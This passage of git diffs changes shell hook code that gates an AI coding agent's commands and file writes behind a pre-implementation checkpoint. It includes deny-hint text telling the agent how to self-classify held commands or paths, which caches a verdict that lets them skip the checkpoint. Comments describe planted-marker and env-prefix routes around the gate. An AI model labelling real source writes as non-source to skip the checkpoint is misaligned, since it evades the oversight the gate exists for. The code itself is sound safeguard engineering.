+  self_dir="$(cd -P "$(dirname "${BASH_SOURCE[0]}")" 2>/dev/null && pwd)"
+  local repo="$self_dir/../../scripts/classifier-marker.mjs"
+  if [ -f "$repo" ]; then printf '%s' "$repo"; return 0; fi
+  printf '%s' "classifier-marker.mjs"
+  return 0
+}
+
+# Short stable digest of the command for the .cmd filename. Falls back to a
+# fixed token if no hashing utility is available (the filename is cosmetic; the
+# agent may name the file anything).
+__agent_classifier_deny_digest() {
+  local s="$1"
+  if command -v shasum >/dev/null 2>&1; then
+    printf '%s' "$s" | shasum 2>/dev/null | awk '{print substr($1,1,12)}'
+  elif command -v sha1sum >/dev/null 2>&1; then
+    printf '%s' "$s" | sha1sum 2>/dev/null | awk '{print substr($1,1,12)}'
+  else
+    printf '%s' "cmd"
+  fi
+}
+
+agent_classifier_deny_hint() {
+  local command="$1" repo_root="$2" caller_cwd="$3" session_id="$4"
+  local helper digest cmd_file
+  helper="$(__agent_classifier_deny_resolve_helper)"
+  digest="$(__agent_classifier_deny_digest "$command")"
+  cmd_file="$repo_root/.checkpoints/classify/pending-$digest.cmd"
+  cat <<EOF
+This Bash command arms the Rule 18 pre-implementation checkpoint (it writes file
+content, or its target can't be determined). If this command is part of your
+IMPLEMENTATION, the pre-implementation checkpoint above IS the required action —
+write it, then retry.
+
+ONLY if this command is NOT a repo-source write, classify it ONCE and retry; the
+verdict is cached for this session (and auto-persists), so you are asked at most
+once per command shape:
+  - read_only    — it genuinely writes nothing (output only to stdout/stderr/tmp).
+  - nonsrc_write — it writes, but NOT repo source: .git internals, package
+                   installs, mkdir/rmdir, a redirect to /tmp or outside the repo,
+                   or the episodic-memory episode store.
+
+To classify (OS-neutral, no shell chaining required):
+  1. Write the command verbatim to:
+       $cmd_file
+  2. From the repository root ($repo_root) run classifier-marker.mjs
+     (process.cwd() MUST canonicalize to the repo root — the helper refuses
+     otherwise; this is a precondition, not a 'cd &&' you must paste):
+       node "$helper" --write \\
+         --project-root "$repo_root" --caller-cwd "$caller_cwd" \\
+         --command-file "$cmd_file" \\
+         --label <read_only|nonsrc_write> --confidence 0.9 \\
+         --reason "<why this is not a repo-source write>" \\
+         --session-id "$session_id"
+  3. Retry the original command.
+
+Do NOT classify a real repo-source write as read_only or nonsrc_write — it
+persists a permanent pre-checkpoint bypass for that command shape. The push-gate
+still blocks an unverified push regardless of this verdict.
+EOF
+}

--- a/hooks/lib/agent-classifier-deny-reason.sh
+++ b/hooks/lib/agent-classifier-deny-reason.sh
@@ -65,18 +65,17 @@ agent_classifier_deny_hint() {
   digest="$(__agent_classifier_deny_digest "$command")"
   cmd_file="$repo_root/.checkpoints/classify/pending-$digest.cmd"
   cat <<EOF
-This Bash command arms the Rule 18 pre-implementation checkpoint (it writes file
-content, or its target can't be determined). If this command is part of your
-IMPLEMENTATION, the pre-implementation checkpoint above IS the required action —
-write it, then retry.
-
-ONLY if this command is NOT a repo-source write, classify it ONCE and retry; the
-verdict is cached for this session (and auto-persists), so you are asked at most
-once per command shape:
+This Bash command is not auto-classified as read-only, so it is HELD for the
+agent classifier (it has NOT run). Classify it ONCE and retry; the verdict is
+cached for this session (and auto-persists), so you are asked at most once per
+command shape:
   - read_only    — it genuinely writes nothing (output only to stdout/stderr/tmp).
   - nonsrc_write — it writes, but NOT repo source: .git internals, package
                    installs, mkdir/rmdir, a redirect to /tmp or outside the repo,
                    or the episodic-memory episode store.
+  - shared_write — it writes REPO SOURCE (this IS implementation). Classifying it
+                   shared_write arms the Rule 18 pre-implementation checkpoint;
+                   write that checkpoint block, then retry.
 
 To classify (OS-neutral — single-line command, no line-continuations or shell
 chaining; the double-quoted args work in bash, PowerShell, and cmd alike):
@@ -85,7 +84,7 @@ chaining; the double-quoted args work in bash, PowerShell, and cmd alike):
   2. From the repository root ($repo_root) run classifier-marker.mjs
      (process.cwd() MUST canonicalize to the repo root — the helper refuses
      otherwise; this is a precondition, not a 'cd &&' you must paste):
-       node "$helper" --write --project-root "$repo_root" --caller-cwd "$caller_cwd" --command-file "$cmd_file" --label <read_only|nonsrc_write> --confidence 0.9 --reason "<why this is not a repo-source write>" --session-id "$session_id"
+       node "$helper" --write --project-root "$repo_root" --caller-cwd "$caller_cwd" --command-file "$cmd_file" --label <read_only|nonsrc_write|shared_write> --confidence 0.9 --reason "<why this classification>" --session-id "$session_id"
   3. Retry the original command.
 
 Do NOT classify a real repo-source write as read_only or nonsrc_write — it

--- a/hooks/lib/agent-classifier-deny-reason.sh
+++ b/hooks/lib/agent-classifier-deny-reason.sh
@@ -97,3 +97,48 @@ persists a permanent pre-checkpoint bypass for that command shape. The push-gate
 still blocks an unverified push regardless of this verdict.
 EOF
 }
+
+# agent_classifier_path_deny_hint <file_path> <repo_root> <caller_cwd> <session_id>
+#   echoes the 2-way hint shown when a Write/Edit targets an in-repo path with
+#   no fresh path verdict on file (PR-B2 §11). Symmetric with the Bash 3-way
+#   hint above, but for a TARGET PATH and 2-way: the only downgrade for a write
+#   is nonsrc_write (the file is a plan/scratch/doc/generated artifact, not repo
+#   source); otherwise the write IS implementation and the pre-checkpoint is the
+#   required action. The invocation uses --target-path (a single argument — no
+#   command-file or shell quoting needed), still expressed as an OS-neutral
+#   precondition ("from the repository root") rather than a `cd '<repo>' && …`
+#   chain, for cross-tool/cross-OS harnesses (§12/§15).
+agent_classifier_path_deny_hint() {
+  local file_path="$1" repo_root="$2" caller_cwd="$3" session_id="$4"
+  local helper
+  helper="$(__agent_classifier_deny_resolve_helper)"
+  cat <<EOF
+This Write/Edit targets a file under the repository:
+  $file_path
+so it arms the Rule 18 pre-implementation checkpoint. If this write is part of
+your IMPLEMENTATION, the pre-implementation checkpoint above IS the required
+action — write it, then retry.
+
+ONLY if this file is NOT repo source — a plan / scratch / notes / generated /
+doc file (the kind cross-tool harnesses stage in-project) — classify the TARGET
+PATH once and retry; the verdict is cached for this session, so you are asked at
+most once per path:
+  - nonsrc_write — the target is not repo source.
+
+To classify (OS-neutral, no shell chaining required):
+  From the repository root ($repo_root) run classifier-marker.mjs (process.cwd()
+  MUST canonicalize to the repo root — the helper refuses otherwise; this is a
+  precondition, not a 'cd &&' you must paste):
+    node "$helper" --write \\
+      --project-root "$repo_root" --caller-cwd "$caller_cwd" \\
+      --target-path "$file_path" \\
+      --label nonsrc_write --confidence 0.9 \\
+      --reason "<why this file is not repo source>" \\
+      --session-id "$session_id"
+  Then retry the write.
+
+Do NOT classify a real repo-source write as nonsrc_write — it persists a
+permanent pre-checkpoint bypass for that path. The push-gate still blocks an
+unverified push regardless of this verdict.
+EOF
+}

--- a/hooks/lib/agent-classifier-deny-reason.sh
+++ b/hooks/lib/agent-classifier-deny-reason.sh
@@ -78,18 +78,14 @@ once per command shape:
                    installs, mkdir/rmdir, a redirect to /tmp or outside the repo,
                    or the episodic-memory episode store.
 
-To classify (OS-neutral, no shell chaining required):
+To classify (OS-neutral — single-line command, no line-continuations or shell
+chaining; the double-quoted args work in bash, PowerShell, and cmd alike):
   1. Write the command verbatim to:
        $cmd_file
   2. From the repository root ($repo_root) run classifier-marker.mjs
      (process.cwd() MUST canonicalize to the repo root — the helper refuses
      otherwise; this is a precondition, not a 'cd &&' you must paste):
-       node "$helper" --write \\
-         --project-root "$repo_root" --caller-cwd "$caller_cwd" \\
-         --command-file "$cmd_file" \\
-         --label <read_only|nonsrc_write> --confidence 0.9 \\
-         --reason "<why this is not a repo-source write>" \\
-         --session-id "$session_id"
+       node "$helper" --write --project-root "$repo_root" --caller-cwd "$caller_cwd" --command-file "$cmd_file" --label <read_only|nonsrc_write> --confidence 0.9 --reason "<why this is not a repo-source write>" --session-id "$session_id"
   3. Retry the original command.
 
 Do NOT classify a real repo-source write as read_only or nonsrc_write — it
@@ -125,16 +121,12 @@ PATH once and retry; the verdict is cached for this session, so you are asked at
 most once per path:
   - nonsrc_write — the target is not repo source.
 
-To classify (OS-neutral, no shell chaining required):
+To classify (OS-neutral — single-line command, no line-continuations or shell
+chaining; the double-quoted args work in bash, PowerShell, and cmd alike):
   From the repository root ($repo_root) run classifier-marker.mjs (process.cwd()
   MUST canonicalize to the repo root — the helper refuses otherwise; this is a
   precondition, not a 'cd &&' you must paste):
-    node "$helper" --write \\
-      --project-root "$repo_root" --caller-cwd "$caller_cwd" \\
-      --target-path "$file_path" \\
-      --label nonsrc_write --confidence 0.9 \\
-      --reason "<why this file is not repo source>" \\
-      --session-id "$session_id"
+    node "$helper" --write --project-root "$repo_root" --caller-cwd "$caller_cwd" --target-path "$file_path" --label nonsrc_write --confidence 0.9 --reason "<why this file is not repo source>" --session-id "$session_id"
   Then retry the write.
 
 Do NOT classify a real repo-source write as nonsrc_write — it persists a

--- a/hooks/lib/agent-classifier.sh
+++ b/hooks/lib/agent-classifier.sh
@@ -196,7 +196,7 @@ agent_classify_command() {
       # helper's threshold gate (default 0.7).
       local parsed
       parsed="$(printf '%s' "$out" | node -e '
-        const ALLOWED = new Set(["read_only","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
+        const ALLOWED = new Set(["read_only","nonsrc_write","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
         let buf = ""
         process.stdin.on("data", c => buf += c)
         process.stdin.on("end", () => {
@@ -267,7 +267,7 @@ agent_classify_command() {
         # marker-cache parser above).
         local parsed
         parsed="$(printf '%s' "$out" | node -e '
-          const ALLOWED = new Set(["read_only","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
+          const ALLOWED = new Set(["read_only","nonsrc_write","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
           let buf = ""
           process.stdin.on("data", c => buf += c)
           process.stdin.on("end", () => {

--- a/hooks/lib/agent-classifier.sh
+++ b/hooks/lib/agent-classifier.sh
@@ -313,6 +313,86 @@ agent_classify_command() {
   return 1
 }
 
+# agent_classify_path <file_path> <repo_root> <caller_cwd>
+#   echoes "<label>" (read_only|nonsrc_write|…) on a per-session marker hit
+#   (exit 0); echoes "" and returns 1 on miss / helper-absent / root drift.
+#
+# PR-B2 S3 (§11/§14-F4): the Write/Edit pre-checkpoint arm was a pure path
+# heuristic — any in-repo target armed — which over-arms on plan/scratch/doc
+# files cross-tool harnesses stage in-project. This is the READ side of the
+# path-verdict escape: the agent classifies a TARGET path once via
+# `classifier-marker.mjs --write --target-path`, and the gate consults the
+# verdict here. Mirrors agent_classify_command but with --target-path instead
+# of --command. NO auto-persist: path verdicts have no Tier-0 analog
+# (classify_path is path-shaped, not command-shaped), so they live only as
+# per-session markers — re-classified each session, like cross-session command
+# markers before Tier-0 promotion. NO legacy direct-fetch fallback (paths were
+# never an LLM-dispatch subject).
+agent_classify_path() {
+  local file_path="$1"
+  local repo_root="$2"
+  local caller_cwd="$3"
+
+  if [ -z "$file_path" ] || [ -z "$repo_root" ] || [ -z "$caller_cwd" ]; then
+    return 1
+  fi
+
+  local session_id
+  session_id="$(__agent_classifier_session_id)"
+
+  local marker_helper
+  if ! marker_helper="$(__agent_classifier_resolve_marker_helper)"; then
+    return 1
+  fi
+
+  local out
+  # Subshell cd forces helper's process.cwd() to repo_root (the helper's
+  # canonicalization binds the target to --project-root). 2>/dev/null keeps
+  # helper diagnostics out of the hook stream.
+  out="$(cd "$repo_root" 2>/dev/null && node "$marker_helper" --read \
+    --project-root "$repo_root" \
+    --caller-cwd "$caller_cwd" \
+    --target-path "$file_path" \
+    --session-id "$session_id" 2>/dev/null)"
+  local rc=$?
+  if [ $rc -ne 0 ] || [ -z "$out" ]; then
+    return 1
+  fi
+
+  local parsed
+  parsed="$(printf '%s' "$out" | node -e '
+    const ALLOWED = new Set(["read_only","nonsrc_write","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
+    let buf = ""
+    process.stdin.on("data", c => buf += c)
+    process.stdin.on("end", () => {
+      try {
+        const last = buf.trim().split("\n").pop()
+        const j = JSON.parse(last)
+        if (j.status !== "hit") { process.stdout.write(""); return }
+        let label = j.label || ""
+        if (label && !ALLOWED.has(label)) label = ""
+        const root = String(j.project_root_used || "").replace(/[\t\n\r]/g, "_")
+        process.stdout.write(`${label}\t${root}`)
+      } catch { process.stdout.write("") }
+    })
+  ' 2>/dev/null)"
+
+  if [ -n "$parsed" ]; then
+    local label root
+    label="$(printf '%s' "$parsed" | awk -F'\t' '{print $1}')"
+    root="$(printf '%s' "$parsed" | awk -F'\t' '{print $2}')"
+    # Re-verify project_root_used echo (macOS /var → /private/var; PR #336
+    # file 6/8 lesson) before trusting the verdict.
+    local _repo_root_canon
+    _repo_root_canon="$(cd "$repo_root" 2>/dev/null && pwd -P)"
+    if [ -n "$label" ] && [ "$root" = "$_repo_root_canon" ]; then
+      printf '%s\n' "$label"
+      return 0
+    fi
+  fi
+  return 1
+}
+
 # Check classifier-config.json transport field. Default: marker-only.
 __agent_classifier_legacy_enabled() {
   local repo_root="$1"

--- a/hooks/lib/command-classifier.sh
+++ b/hooks/lib/command-classifier.sh
@@ -9,9 +9,15 @@
 #   classify_command "$cmd"  → echoes "LABEL\tTARGET\tREASON"
 #   classify_path    "$path" → echoes "LABEL\tTARGET\tREASON" (for Write/Edit)
 #
-# Six labels (per Codex review `...cad2`/`...3503`):
+# Seven labels (per Codex review `...cad2`/`...3503`; nonsrc_write added PR-B2 #351):
 #   read_only           pure observation (ls, cat, git status, gh pr view, …)
-#   shared_write        local side-effect (git commit, npm install, mkdir, …)
+#   nonsrc_write        writes, but definitely NOT repo source — .git internals
+#                         (git commit/add), package installs (npm/yarn install),
+#                         mkdir/rmdir, em-store episode-store writes. FREE: never
+#                         arms the Rule 18 pre-implementation checkpoint (#351).
+#   shared_write        repo-source content write OR can't-tell (redirects to a
+#                         file, non-allowlisted node/python, cp/mv/dd, working-
+#                         tree-mutating git, …). ARMS the pre-checkpoint.
 #   push_or_pr_create   publishes/mutates shared state
 #                         (git push, gh pr create/merge/close/…, gh issue …,
 #                          gh release, gh api -X POST/PUT/PATCH/DELETE, …)
@@ -951,7 +957,95 @@ _detect_helper_invocation() {
 #  10. Otherwise → shared_write (default for write-side commands we don't
 #      explicitly recognize).
 
+# ---------------------------------------------------------------------------
+# G1 (#351, PR-B2, §16/D8): general per-session marker-cache lookup for the
+# escapable content-write emit sites.
+#
+# The interpreter branch (node/python …) already consults the per-session
+# agent-classifier marker via agent_classify_command. The escapable hardcoded
+# shared_write emits — shell redirects (echo_redirected / readonly_cmd_
+# redirected) and the terminal default_write — did NOT, so the agent-verdict
+# escape was INOPERATIVE for the exact pure-Bash content-write class #351
+# targets (codex G1 verified on disk: a marker for `echo x > scripts/x.mjs`
+# left classify_command still returning shared_write echo_redirected). This
+# helper bridges that gap.
+#
+# Contract: call IMMEDIATELY BEFORE an escapable shared_write emit. On a
+# per-session marker hit it echoes "<label>\t\t<reason>" (exit 0); on a miss /
+# env-prefix / dispatcher-absent it echoes nothing and returns 1, so the caller
+# emits its conservative shared_write default.
+#
+# Hard-deny preservation (D8): invoked ONLY at the escapable emit sites. Every
+# structural hard-deny lane — env-prefix classifier-marker override, shell
+# wrappers, marker writes, push_or_pr_create, unsafe_complex, git/gh, rm/tee/
+# touch — classifies and RETURNS earlier in _classify_segment, so it can never
+# reach this helper and can never be downgraded by a planted marker. As
+# defense-in-depth, env_prefix_count>0 additionally short-circuits (mirrors the
+# Tier-0 lookup's env-prefix gate — cross-session attack class, PR #271).
+#
+# Reads _classify_segment locals via dynamic scope (TOKS, target_root,
+# caller_cwd_authoritative, env_prefix_count) — identical to how the
+# interpreter branch reads them.
+# ---------------------------------------------------------------------------
+_try_agent_marker_verdict() {
+  # env-prefix forms never escape (cross-session attack class, PR #271).
+  if [ "${env_prefix_count:-0}" -ne 0 ]; then
+    return 1
+  fi
+  # Lazy-source the agent-classifier wrapper once (same guard + resolution the
+  # interpreter branch uses).
+  if [ -z "${__AGENT_CLASSIFIER_SOURCED:-}" ]; then
+    local __agent_lib_path
+    __agent_lib_path="$(cd "$(dirname "${BASH_SOURCE[0]}")" 2>/dev/null && pwd)/agent-classifier.sh"
+    if [ -f "$__agent_lib_path" ]; then
+      # shellcheck disable=SC1091
+      source "$__agent_lib_path"
+      __AGENT_CLASSIFIER_SOURCED=1
+    else
+      __AGENT_CLASSIFIER_SOURCED=0
+    fi
+  fi
+  if [ "${__AGENT_CLASSIFIER_SOURCED:-0}" != "1" ]; then
+    return 1
+  fi
+  # Command text for the lookup key. PREFER the raw command threaded from
+  # classify_command (_seg_raw_command via dynamic scope) — it is the EXACT
+  # string the agent invoked and the deny-hint tells the agent to classify, so
+  # normalizeCommand(read) == normalizeCommand(write) exactly, INCLUDING shell
+  # redirects (`echo x > src.mjs`). A token-only reconstruction would DROP the
+  # `> src.mjs` redirect (it's a REDIR record, not a TOK) and miss the marker —
+  # the exact #351 redirect class. Fall back to the token reconstruction only
+  # when the raw command wasn't threaded (e.g. direct _classify_segment unit
+  # tests); that fallback matches for redirect-free commands (cp/node …).
+  local __cmd_text="${_seg_raw_command:-}"
+  if [ -z "$__cmd_text" ]; then
+    local __ti
+    for __ti in ${TOKS[@]+"${TOKS[@]}"}; do
+      if [ -z "$__cmd_text" ]; then
+        __cmd_text="$__ti"
+      else
+        __cmd_text="$__cmd_text $__ti"
+      fi
+    done
+  fi
+  [ -z "$__cmd_text" ] && return 1
+  local __agent_out __agent_label
+  if __agent_out="$(agent_classify_command "$__cmd_text" "$target_root" "$caller_cwd_authoritative" 2>/dev/null)"; then
+    __agent_label="${__agent_out%%	*}"
+    if [ -n "$__agent_label" ]; then
+      printf '%s\t\t%s\n' "$__agent_label" "bash_marker_cache_hit"
+      return 0
+    fi
+  fi
+  return 1
+}
+
 _classify_segment() {
+  # $3 (optional): the RAW command text threaded from classify_command, used
+  # by _try_agent_marker_verdict for an exact marker-key match (redirects
+  # included). Captured before `shift 2` (which only consumes $1/$2). Empty
+  # when _classify_segment is exercised directly (unit tests).
+  local _seg_raw_command="${3:-}"
   local target_root="$1"  # repo root for marker resolution
   # PR-A P1.1: authoritative caller cwd threaded from classify_command. The
   # hook's authoritative cwd is parsed JSON .cwd in checkpoint-gate.sh:48 /
@@ -1570,7 +1664,7 @@ _classify_segment() {
         # awk extraction stage.
         local __t0_parsed
         __t0_parsed="$(printf '%s' "$__t0_out" | node -e '
-          const ALLOWED = new Set(["read_only","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
+          const ALLOWED = new Set(["read_only","nonsrc_write","shared_write","marker_write","push_or_pr_create","unsafe_complex"])
           let buf = ""
           process.stdin.on("data", c => buf += c)
           process.stdin.on("end", () => {
@@ -1618,6 +1712,12 @@ _classify_segment() {
       # always writes. Err safe and let those fall through to default
       # shared_write or, where structural risk warrants, unsafe_complex below.
       if [ "$has_nonmarker_redirect" = "1" ]; then
+        # G1 (#351): agent-verdict escape BEFORE the conservative shared_write.
+        local __rd_mv
+        if __rd_mv="$(_try_agent_marker_verdict)"; then
+          printf '%s\n' "$__rd_mv"
+          return 0
+        fi
         printf '%s\t\t%s\n' "shared_write" "readonly_cmd_redirected"
         return 0
       fi
@@ -1627,10 +1727,56 @@ _classify_segment() {
     echo|printf|true|false)
       # echo/printf with output redirect → shared_write; without → read_only.
       if [ "$has_nonmarker_redirect" = "1" ]; then
+        # G1 (#351): agent-verdict escape BEFORE the conservative shared_write.
+        local __ec_mv
+        if __ec_mv="$(_try_agent_marker_verdict)"; then
+          printf '%s\n' "$__ec_mv"
+          return 0
+        fi
         printf '%s\t\t%s\n' "shared_write" "echo_redirected"
         return 0
       fi
       printf '%s\t\t%s\n' "read_only" "echo_or_printf"
+      return 0
+      ;;
+    npm|pnpm|yarn)
+      # PR-B2 (#351, M4): dependency INSTALL only → nonsrc_write (writes
+      # node_modules + lockfile, not working-tree source). `run`/`exec`/publish/
+      # bare/unknown fall through to shared_write — they can execute arbitrary
+      # code that mutates source. `npx` is a separate binary (not matched here)
+      # and also stays shared_write. Detect the first non-flag token as the
+      # subcommand. (Lifecycle scripts on `install` are accepted under the
+      # honest-agent threat model — friction-reduction, not a security boundary.)
+      local _np_sub="" _np_i=$((idx+1)) _np_n=${#TOKS[@]}
+      while [ $_np_i -lt $_np_n ]; do
+        case "${TOKS[$_np_i]}" in
+          -*) _np_i=$((_np_i+1)) ;;
+          *)  _np_sub="${TOKS[$_np_i]}"; break ;;
+        esac
+      done
+      case "$_np_sub" in
+        install|i|ci|add)
+          if [ "$has_nonmarker_redirect" = "1" ]; then
+            printf '%s\t\t%s\n' "shared_write" "pkg_install_redirected"
+            return 0
+          fi
+          printf '%s\t\t%s\n' "nonsrc_write" "pkg_install"
+          return 0
+          ;;
+      esac
+      printf '%s\t\t%s\n' "shared_write" "pkg_other"
+      return 0
+      ;;
+    mkdir|rmdir)
+      # PR-B2 (#351, M4): directory create/remove writes no working-tree source
+      # CONTENT (mkdir makes empty dirs; rmdir removes only empty ones). FREE.
+      # Files later added to the dir classify on their own. A redirect still
+      # demotes to shared_write (the redirect target may be repo source).
+      if [ "$has_nonmarker_redirect" = "1" ]; then
+        printf '%s\t\t%s\n' "shared_write" "dir_cmd_redirected"
+        return 0
+      fi
+      printf '%s\t\t%s\n' "nonsrc_write" "dir_create_remove"
       return 0
       ;;
     node|python|python3|ruby|perl)
@@ -1695,7 +1841,10 @@ _classify_segment() {
           return 0
           ;;
         em-store.mjs|em-revise.mjs|em-prune.mjs|em-violation.mjs|em-recall.mjs)
-          printf '%s\t\t%s\n' "shared_write" "interpreter_em_write"
+          # PR-B2 (#351): em-* writes the episodic-memory episode store
+          # (~/.episodic-memory/ or <project>/.episodic-memory/), NOT working-
+          # tree source. FREE — never arms the pre-checkpoint.
+          printf '%s\t\t%s\n' "nonsrc_write" "interpreter_em_write"
           return 0
           ;;
         classify-correction.mjs)
@@ -1793,6 +1942,15 @@ _classify_segment() {
   esac
 
   # ---- Default ----
+  # G1 (#351): the terminal content-write bucket (cp/mv/dd/rsync/curl/… and any
+  # unrecognized shape). Agent-verdict escape BEFORE the conservative
+  # shared_write — this is the core "don't-know → arm, agent downgrades once"
+  # site. Hard-deny lanes never reach here (they return earlier).
+  local __df_mv
+  if __df_mv="$(_try_agent_marker_verdict)"; then
+    printf '%s\n' "$__df_mv"
+    return 0
+  fi
   printf '%s\t\t%s\n' "shared_write" "default_write"
   return 0
 }
@@ -1831,7 +1989,8 @@ _classify_git() {
   done
 
   if [ -z "$sub" ]; then
-    printf '%s\t\t%s\n' "shared_write" "git_no_subcommand"
+    # PR-B2 (#351): bare `git` prints help — writes nothing.
+    printf '%s\t\t%s\n' "nonsrc_write" "git_no_subcommand"
     return 0
   fi
 
@@ -1873,12 +2032,14 @@ _classify_git() {
         _gj=$((_gj+1))
       done
       if [ $_has_write_flag -eq 1 ]; then
-        printf '%s\t\t%s\n' "shared_write" "git_${sub}_write_flag"
+        # PR-B2 (#351): branch/tag delete/rename/move/track are .git ref ops —
+        # they never touch working-tree source.
+        printf '%s\t\t%s\n' "nonsrc_write" "git_${sub}_write_flag"
         return 0
       fi
       if [ $_free_positional -eq 1 ] && [ $_has_read_flag -eq 0 ]; then
-        # Bare `git branch new-name` or `git tag v1.0` creates.
-        printf '%s\t\t%s\n' "shared_write" "git_${sub}_create"
+        # Bare `git branch new-name` or `git tag v1.0` creates a ref (.git only).
+        printf '%s\t\t%s\n' "nonsrc_write" "git_${sub}_create"
         return 0
       fi
       printf '%s\t\t%s\n' "read_only" "git_${sub}_read"
@@ -1897,7 +2058,8 @@ _classify_git() {
       if [ $_gj -lt ${#T[@]} ]; then
         case "${T[$_gj]}" in
           add|remove|rm|rename|set-url|set-head|set-branches|prune|update)
-            printf '%s\t\t%s\n' "shared_write" "git_remote_${T[$_gj]}"
+            # PR-B2 (#351): remote config writes .git/config, not working-tree source.
+            printf '%s\t\t%s\n' "nonsrc_write" "git_remote_${T[$_gj]}"
             return 0 ;;
         esac
       fi
@@ -1918,7 +2080,12 @@ _classify_git() {
         # them as writes; the inverted-default revision dropped them. Restore.
         case "${T[$_gj]}" in
           add|remove|move|repair|lock|unlock|prune)
-            printf '%s\t\t%s\n' "shared_write" "git_worktree_${T[$_gj]}"
+            # PR-B2 (#351): worktree mgmt is .git metadata. NOTE: `git worktree
+            # add <path>` materializes a NEW checkout at <path> — but that path
+            # is a sibling worktree, not the current repo's tracked source, and
+            # the classifier carries no target to distinguish. Lean-accept per
+            # R1 (flagged in the test matrix). The push-gate still backstops.
+            printf '%s\t\t%s\n' "nonsrc_write" "git_worktree_${T[$_gj]}"
             return 0 ;;
         esac
       fi
@@ -1957,21 +2124,37 @@ _classify_git() {
         _gj=$((_gj+1))
       done
       if [ $_has_write_flag -eq 1 ]; then
-        printf '%s\t\t%s\n' "shared_write" "git_config_write_flag"
+        # PR-B2 (#351): git config writes .git/config (or ~/.gitconfig), not source.
+        printf '%s\t\t%s\n' "nonsrc_write" "git_config_write_flag"
         return 0
       fi
       if [ $_np -ge 2 ] && [ $_has_read_flag -eq 0 ]; then
-        printf '%s\t\t%s\n' "shared_write" "git_config_set"
+        printf '%s\t\t%s\n' "nonsrc_write" "git_config_set"
         return 0
       fi
       printf '%s\t\t%s\n' "read_only" "git_config_read"
       return 0
       ;;
-    commit|add|rm|mv|reset|restore|checkout|switch|merge|rebase|cherry-pick|revert|stash|clean|pull|clone|init|gc|prune|notes|submodule|apply|am|format-patch|bisect|update-index|update-ref|symbolic-ref|hash-object|mktree|read-tree|write-tree|commit-tree|fsck|repack|pack-refs|pack-objects|unpack-objects|prune-packed|rerere|filter-branch|replay|sparse-checkout|maintenance)
+    # PR-B2 (#351, §14-F1): git subcommand as a TOTAL FUNCTION. The git
+    # subcommand set is closed/finite (NOT the leaky open-binary class), so we
+    # carve out ONLY pure .git/index/object/ref ops → nonsrc_write (FREE);
+    # everything working-tree-mutating, creating, or ambiguous stays
+    # shared_write (ARM), and the `*)` default below catches every unlisted
+    # subcommand conservatively. The classifier matches the bare subcommand
+    # token (no arg parsing), so `git rm --cached` is NOT distinguished from
+    # `git rm` → both ARM (conservative; closes the §14-F1 `--cached` gap).
+    commit|add|notes|update-ref|update-index|symbolic-ref|hash-object|mktree|write-tree|commit-tree|gc|repack|pack-refs|pack-objects|unpack-objects|prune|prune-packed|fsck|maintenance|rerere|init)
+      # .git/index/object/ref only — no working-tree source mutation.
+      printf '%s\t\t%s\n' "nonsrc_write" "git_metadata_write"
+      return 0
+      ;;
+    rm|mv|reset|restore|checkout|switch|merge|rebase|cherry-pick|revert|stash|clean|pull|clone|submodule|apply|am|read-tree|format-patch|bisect|sparse-checkout|filter-branch|replay)
+      # Working-tree-mutating / creating / ambiguous → ARM.
       printf '%s\t\t%s\n' "shared_write" "git_local_write"
       return 0
       ;;
     *)
+      # Unlisted subcommand → ARM (complete by construction).
       printf '%s\t\t%s\n' "shared_write" "git_unknown_subcommand"
       return 0
       ;;
@@ -2203,7 +2386,7 @@ classify_command() {
   # Split into segments by control operator
   # Each segment classified, final label = MOST RESTRICTIVE.
   # Restrictiveness order (most → least):
-  #   unsafe_complex > push_or_pr_create > shared_write > marker_write > read_only > unknown
+  #   unsafe_complex > push_or_pr_create > shared_write > marker_write > unknown > nonsrc_write > read_only
   # marker_write is intentionally NOT most-restrictive: a segment chained
   # AFTER a marker write doesn't downgrade the marker write, but a marker
   # write chained AFTER a push_or_pr_create still upgrades to push.
@@ -2232,7 +2415,7 @@ classify_command() {
         # End segment, classify
         if [ -n "$seg_lines" ]; then
           local result
-          result="$(printf '%s\n' "$seg_lines" | _classify_segment "$repo_root" "$caller_cwd_authoritative")"
+          result="$(printf '%s\n' "$seg_lines" | _classify_segment "$repo_root" "$caller_cwd_authoritative" "$cmd")"
           local lbl="${result%%	*}"
           local rest="${result#*	}"
           local tgt="${rest%%	*}"
@@ -2254,7 +2437,7 @@ classify_command() {
   # Final segment
   if [ -n "$seg_lines" ]; then
     local result
-    result="$(printf '%s\n' "$seg_lines" | _classify_segment "$repo_root" "$caller_cwd_authoritative")"
+    result="$(printf '%s\n' "$seg_lines" | _classify_segment "$repo_root" "$caller_cwd_authoritative" "$cmd")"
     local lbl="${result%%	*}"
     local rest="${result#*	}"
     local tgt="${rest%%	*}"
@@ -2272,12 +2455,18 @@ classify_command() {
 
 # Priority for "most restrictive wins" reduction.
 _priority() {
+  # PR-B2 (#351, §14-F3): renumbered to insert nonsrc_write=2 while preserving
+  # the relative order of the existing labels. nonsrc_write ranks ABOVE
+  # read_only (so a `nonsrc_write && read_only` chain stays nonsrc_write, not
+  # downgraded to read_only's gate-allow) and BELOW unknown/marker/shared (so a
+  # chain mixing nonsrc_write with any arming label upgrades conservatively).
   case "$1" in
-    unsafe_complex)     printf '6' ;;
-    push_or_pr_create)  printf '5' ;;
-    shared_write)       printf '4' ;;
-    marker_write)       printf '3' ;;
-    unknown)            printf '2' ;;
+    unsafe_complex)     printf '7' ;;
+    push_or_pr_create)  printf '6' ;;
+    shared_write)       printf '5' ;;
+    marker_write)       printf '4' ;;
+    unknown)            printf '3' ;;
+    nonsrc_write)       printf '2' ;;
     read_only)          printf '1' ;;
     *)                  printf '0' ;;
   esac

--- a/hooks/lib/command-classifier.sh
+++ b/hooks/lib/command-classifier.sh
@@ -1847,6 +1847,19 @@ _classify_segment() {
           printf '%s\t\t%s\n' "nonsrc_write" "interpreter_em_write"
           return 0
           ;;
+        install.mjs)
+          # 2026-05-26: install.mjs is the deploy tool. It writes
+          # ~/.episodic-memory/scripts, ~/.claude/hooks/*, and installed
+          # skill/config artifacts under <project>/.claude/ (untracked) — never
+          # repo SOURCE (scripts/, hooks/, tests/, docs/*.md). nonsrc_write so a
+          # deploy never arms the pre-checkpoint nor needs a per-run marker
+          # (same gate-class as the em-* episode-store writes above). Without
+          # this, a first-run misclassification could auto-persist a stale
+          # shared_write Tier-0 override that then permanently shadows the
+          # correct verdict.
